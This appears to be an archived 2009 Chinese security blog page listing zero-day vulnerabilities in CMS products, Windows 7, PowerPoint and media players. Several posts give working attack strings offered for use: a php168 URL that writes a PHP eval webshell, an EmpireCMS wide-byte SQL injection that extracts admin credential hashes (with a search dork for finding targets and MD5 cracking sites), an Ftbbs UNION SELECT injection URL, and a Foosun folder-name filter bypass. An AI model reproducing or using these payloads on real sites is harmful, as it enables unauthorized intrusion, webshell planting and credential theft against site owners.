0day|P9's BLOG

09 九 09 php1686.0被爆0day可瞬间获得webshell

php168是一套php写的cms程序,在业界是比较出名的而且一直很高调,此次被公布出来的0day不仅影响到php168 6.0而且还牵扯到6.0以下的所有版本.测试语句:在登陆界面网址后面加上?makehtml=1&chdb[htmlname]=ccc.php&chdb[path]=cache&content=?php%20@eval($_POST[ccc]);?即可获得一个文件名ccc.php密码为ccc的php小马.

收藏、分享这篇文章!

Tags: 0day

Filed in Network security crack with 0 Comments

15 七 09 风讯4.0 sp7 0day漏洞

转自:零客发现者：bloodsword bink
漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.xxx.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/

06150583700/aaa.asp//&CurrPath=/userfiles/06150583700 (全文…)

收藏、分享这篇文章!

Tags: 0day

Filed in Network security crack with 0 Comments

14 六 09 帝国cms 0day e/tool/gbook/?bid=1

帝国cms 0day

帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1
然后在姓名处填:縗\ 注意当縗\不给用时可以使用%df\替代
然后在联系邮箱处填,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
最后直接提交_前面是管理员名,中间是经过md5加密的密码.md5密码可以到http://www.cmd5.com/或http://www.xmd5.com/查询.帝国cms管理后台地址是e/admin/

收藏、分享这篇文章!

Tags: 0day

Filed in Network security crack with 0 Comments

15 五 09 windows7 0day

windows7 0day

windows7 首个0day被360安全中心发现,该0day属于内核级漏洞,所有windows7 rc版及以下版本都有.漏洞产生原因是gdi程序可以任意权限操作导致系统蓝屏,目前还没有补丁.

收藏、分享这篇文章!

Tags: 0day, Windows 7

Filed in Windows 7 with 0 Comments

08 五 09 powerpoint 0day 补丁

powepoint 0day 补丁

office powerpoint 今日被爆出0day漏洞涉及版本从2000一直到2007几乎所有版本都有这个漏洞,目前还无人发布利用工具,微软将会在5月12日发布紧急补丁,微软关于本漏洞的介绍网页http://www.microsoft.com/technet/security/advisory/969136.mspx

收藏、分享这篇文章!

Tags: 0day, 系统补丁

Filed in Software and driver with 0 Comments

05 五 09 暴风影音0day补丁

暴风影音这几天出了0day漏洞,还好官方及时出了补丁,请安装暴风影音的朋友及时升级,或下载补丁安装,补丁下载地址http://bbs.baofeng.com/job.php?action=download&pid=986719&tid=121239&aid=15807

收藏、分享这篇文章!

Tags: 0day, 系统补丁

Filed in Internet event and application with 0 Comments

07 四 09 Ftbbs7.1静态GBK版注入0day(coolkid提供)

ftbbs7.1注入漏洞

Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin

请使用ftbbs的用户关注它的官网安全补丁发布.

收藏、分享这篇文章!

Tags: 0day, 注入

Filed in Network security crack with 0 Comments

27 三 09 VSB网站综合管理平台0day

VSB 0day给一个简单的POC：在system/firm/firmreg.jsp文件会产生越权操作行为，导致其注册帐号并上传JSP木马！作者:冰的原点[L.S.T]

收藏、分享这篇文章!

Tags: 0day

Filed in Network security crack with 0 Comments

26 三 09 Qcms1.0漏洞

qcms 0day

qcms 0day漏洞如下：
1.可以下载数据库。
2.注入：
后台的登陆文件
见Login.asp(登陆的判断处理)
代码如下：
admin_name=trim(request.Form(“admin_name”))
(全文…)

收藏、分享这篇文章!

Tags: 0day, 注入

Filed in Network security crack with 0 Comments

22 三 09 iShowMusic V1.2 直接写shell漏洞

安全

iShowMusic在error.php 12-26行复制内容到剪贴板代码:
elseif ($_POST['action']==”save”){
$cknumon && GdConfirm($gdcode);
if(empty($id)) {
Showmsg(“no”,”你还未选择歌曲呢!”,”返回重新填 (全文…)

收藏、分享这篇文章!

Tags: 0day, 黑客

Filed in Network security crack with 0 Comments

09 九 09 php1686.0被爆0day可瞬间获得webshell

15 七 09 风讯4.0 sp7 0day漏洞

14 六 09 帝国cms 0day e/tool/gbook/?bid=1

15 五 09 windows7 0day

08 五 09 powerpoint 0day 补丁

05 五 09 暴风影音0day补丁

07 四 09 Ftbbs7.1静态GBK版注入0day(coolkid提供)

27 三 09 VSB网站综合管理平台0day

26 三 09 Qcms1.0漏洞

22 三 09 iShowMusic V1.2 直接写shell漏洞

Categories

Tag Cloud

Random posts

Blogroll